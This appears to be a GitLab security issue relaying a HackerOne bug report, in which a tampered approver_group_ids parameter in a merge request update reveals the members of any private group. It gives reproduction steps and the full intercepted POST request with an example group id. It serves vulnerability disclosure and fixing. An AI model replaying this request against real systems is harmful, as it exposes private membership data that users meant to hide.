Ability to Find Out Private Group's Membership by :group_id
Adding HackerOne due a report we've received. In that use case, a user can add a private group and then view the list of members in the private group.
cc @jritchey WDYT of S3/P3 for group member enumeration?
Security issue (dev): https://dev.gitlab.org/gitlab/gitlab-ee/issues/362
Title: Ability to Find Out Private Group's Membership by :group_id
Scope: *.gitlab.com
Weakness: None
Severity: Low
Link: https://hackerone.com/reports/421906
Date: 2018-10-10 03:32:00 +0000
By: @ngalog
Details: Summary: Usually everything about private group is hidden, including who is in the group, however the approval endpoint allow unauthorised user to add any group, including private group to be the approver. After adding private group to be approver, the merge request page reveal the membership of that private group.
Steps To Reproduce:
- Open a merge request in a project that you have at least maintainer access
- In approver section, randomly select a group to be the approver, and set the number of approver to be 99
- click submit merge request and use burp request to intercept the request
POST /golduserngalog/dfgsgfdg/merge_requests/11 HTTP/1.1
Host: gitlab.com
....
utf8=%E2%9C%93&_method=patch&authenticity_token=KW7qU6n6bQ1CX%2BnbRDNluvMxnwi%2F5VQnYRKT0tjMg%2BByZKoHqgFre5y2A2WJSDgOoTqA9ICRYxLyDtfBvN7VPQ%3D%3D&merge_request%5Btitle%5D=Add+new+file&merge_request%5Bdescription%5D=fdfd&merge_request%5Bassignee_id%5D=&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Bapprover_ids%5D=&merge_request%5Bapprover_group_ids%5D=3711378&merge_request%5Bapprovals_before_merge%5D=99&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=
Change the merge_request%5Bapprover_group_ids%5D
value to any private group id, in this case you can use 3711378
, this is my private group, you can verify it is private by visiting https://gitlab.com/api/v4/groups/3711378
Then after the request, 302 will take you to the merge request page, and it will show the membership in approval status.